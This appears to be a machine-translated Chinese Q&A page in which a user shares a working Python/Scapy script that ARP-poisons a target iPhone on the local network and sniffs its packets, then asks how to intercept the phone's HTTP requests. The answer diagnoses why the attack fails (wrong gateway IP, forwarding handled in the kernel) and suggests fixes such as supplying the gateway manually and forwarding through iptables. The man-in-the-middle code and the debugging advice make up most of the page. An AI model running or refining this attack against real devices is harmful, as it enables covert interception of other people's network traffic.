使用底部的代码,我试图在我的网络上攻击目标(在这种情况下,iPhone)。
但是,在使用中,如果手机进入网站或其他任何东西,它都不会接收。所有这些都是:
Ether / ARP who has 1xx.1xx.x.17 says xxx.xxx.x.5
Ether / ARP is at 00:5x:cx:8x:6x:61 says 1xx.xxx.x.17
Ether / ARP is at 00:2x:c7:6x:xx:94 says 1xx.xxx.x.5
Ether / ARP is at 00:00:00:00:00:00 says 1xx.xxx.x.17
Ether / ARP is at 00:00:00:00:00:00 says 1xx.xxx.x.17
Ether / IP / UDP xxx.x.x.14:49152 > 239.255.255.250:1900 / Raw
Ether / IP / UDP xxx.xxx.x.51:49152 > 239.255.255.250:1900 / Raw
Ether / ARP who has xxx.xxx.x.14 says xxx.xxx.x.1
插入记录到socket.gethostbyaddr的所有IP都会返回('a23-206-125-85.deploy.static.akamaitechnologies.com', [], ['23.206.125.85']),('qm-in-f188.1e100.net', [], ['173.194.205.188'])等内容。
这些被记录了数百次。 如何修改代码以拦截来自手机的http请求?
代码:
import os
import sys
import time
import signal
import threading
import subprocess
from scapy.error import Scapy_Exception
from scapy.all import *
import getIP
class MitM():
def __init__(self):
"""
-get intro #
-get variables(interface, gate, vict) #
-get mac for gate + vict #
-enable ip forwarding #
-poison target #
-listen for packets
-close with 'finally' loop
-disable ip forwarding
-restore targets
-exit
"""
self.intro() # Broadcast Ping + Arp -a
#####VARIABLES###
print("**Interface used is 'wlan0' \n")
self.Interface = 'wlan0'
conf.verb = 0
conf.interface = self.Interface
self.VictIP = raw_input("**Enter Victim's Ip Address: ")
self.GateIP = (getIP.ip())
print("\n**Gateway is your computer(%s)" % (self.GateIP))
print("**Enabling IP Forwarding...")
subprocess.call(['echo',' 1 >', '/proc/sys/net/ipv4/ip_forward'])
self.HardMAC = subprocess.check_output(['ethtool','-P', self.Interface]).split()[2]
self.GateMAC = self.HardMAC
self.VictMAC = self.getMAC(self.VictIP)
print("**VictMAC is %s" % (self.VictMAC))
print("**GateMAC is %s" % (self.GateMAC))
self.monitor()
def intro(self):
"""Use Subprocess to get 'ping' backs and 'arp' for clean processing."""
print('\nPinging Network Address %s.255' % (getIP.ip()[:9]))
self.NULL = open(os.devnull) # TODO: close file at end of hack
subprocess.call(['ping', '-c','4','-b','%s.255' % (getIP.ip()[:9])], stdout=self.NULL)
arp = subprocess.check_output(['arp','-a'])
arpNames = arp.split()[::7]
arpIP = arp.split()[1::7]
for combo in zip(arpNames, arpIP):
print("%s --> %s" % (combo[0], combo[1]))
print("")
def getMAC(self,ip):
conf.verb = 0
ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ ARP(pdst=ip), timeout=2, \
iface=self.Interface, inter=0.1)
for snd,recv in ans:
return recv.sprintf(r"%Ether.src%")
def ARP_poison(self,gatewayIP, gatewayMAC, victimIP, victimMAC):
poison_target = ARP(op=2, psrc=gatewayIP, pdst=victimIP, hwdst=victimMAC)
poison_gateway = ARP(op=2, psrc=victimIP, pdst=gatewayIP, hwdst=gatewayMAC)
print("**Poisoning Target %s" % (self.VictIP))
if True:
try:
send(poison_target)
send(poison_gateway)
time.sleep(0.5)
except KeyboardInterrupt:
print("\n**Exiting Script...")
self.restore(self.GateIP, self.GateMAC, self.VictIP, self.VictMAC)
sys.exit(1)
return
def restore(self, GatewayIP, GatewayMAC, VictimIP, VictimMAC):
print("**Restoring Targets...\n")
send(ARP(op=2, psrc=GatewayIP, pdst=VictimIP, hwdst="ff:ff:ff:ff:ff:ff", \
hwsrc=GatewayMAC), count=5)
send(ARP(op=2, psrc=VictimIP, pdst=GatewayIP, hwdst="ff:ff:ff:ff:ff:ff", \
hwsrc=VictimMAC), count=5)
sys.exit(1)
def monitor(self):
poison_thread = threading.Thread(target=self.ARP_poison, args= (self.GateIP, self.GateMAC,
self.VictIP, self.VictMAC))
poison_thread.start()
#self.ARP_poison(self.GateIP, self.GateMAC, self.VictIP, self.VictMAC)
try:
print("**Sniffing for packets...\n")
bpf_filter = ('IP host ' + str(self.VictIP))
packets = sniff( prn= lambda x: x.summary(), count=1000)
wrpcap('packets.pcap', packets)
except Exception:
print("Exiting Script...\n")
sys.exit(1)
finally:
self.restore(self.GateIP, self.GateMAC, self.VictIP, self.VictMAC)
subprocess.call(['echo',' 0 >', '/proc/sys/net/ipv4/ip_forward'])
poison_thread.close()
sys.exit(1)
if __name__ == "__main__":
MitM()
getIP.py:
import socket
def ip():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(('google.com', 0))
return s.getsockname()[0]
答案 0 :(得分:0)
TL; DR getIP.py错误,没有可移植的方法来查找网关IP。只需手动找到网关IP并将其提供给脚本。
我的印象是你把ARP和IP混淆了。
要执行ARP中毒,您需要让iPhone认为攻击计算机的MAC是指向网关(路由器)的IP的MAC。网关IP当然是私有IP,您在getIP.py脚本中获得的是私有IP,但它不是网关IP。
没有独立于操作系统的方式来获取网关IP。如果您使用的是Linux ip r l,则会在名称default下显示网关IP,在Windows ipconfig上会打印网关IP。您应该将其添加为脚本中的顶级变量,或者将其作为命令行参数请求。
无法从网络流量本身了解网络网关的原因是导致ARP中毒攻击的原因之一。
ARP中毒的第一条规则是没有IP改变。它适用于OSI堆栈的IP层及其下方。 HTTP要高得多,没有办法只获得HTTP流量,或者只获得TCP流量,或者仅在ARP中毒攻击中获得UDP流量。你得到的是IP层,其上面的所有协议将通过你的攻击机(如果攻击有效)或者不会(如果攻击失败)。
这为我们提供了ARP中毒的第二条规则:来自受害者计算机的所有网络流量现在都将通过攻击计算机,没有例外。如果攻击计算机没有转发网络流量,受害者会认为它有关于网关的错误ARP信息,并保持重新发送ARP数据包以找到网关的正确MAC地址。
我在你的代码中看到了ARP中毒本身,但我并非100%确定:
subprocess.call(['echo',' 1 >', '/proc/sys/net/ipv4/ip_forward'])
实际上允许您查看用户空间中的数据包。我要小心谨慎,并认为该代码只是让内核翻转一些标志,允许NIC重写MAC并将其发回。即转发的数据包可能永远不会比NIC更深。我尝试在更高级别(iptables)上编写转发,以确保数据包进入用户空间。
有几种针对ARP中毒的保护措施。最常见的是在ARP表中冻结记录,即一旦知道ARP记录,就不能通过新的ARP分组进行更改。 iPhone可能会使用这种保护措施。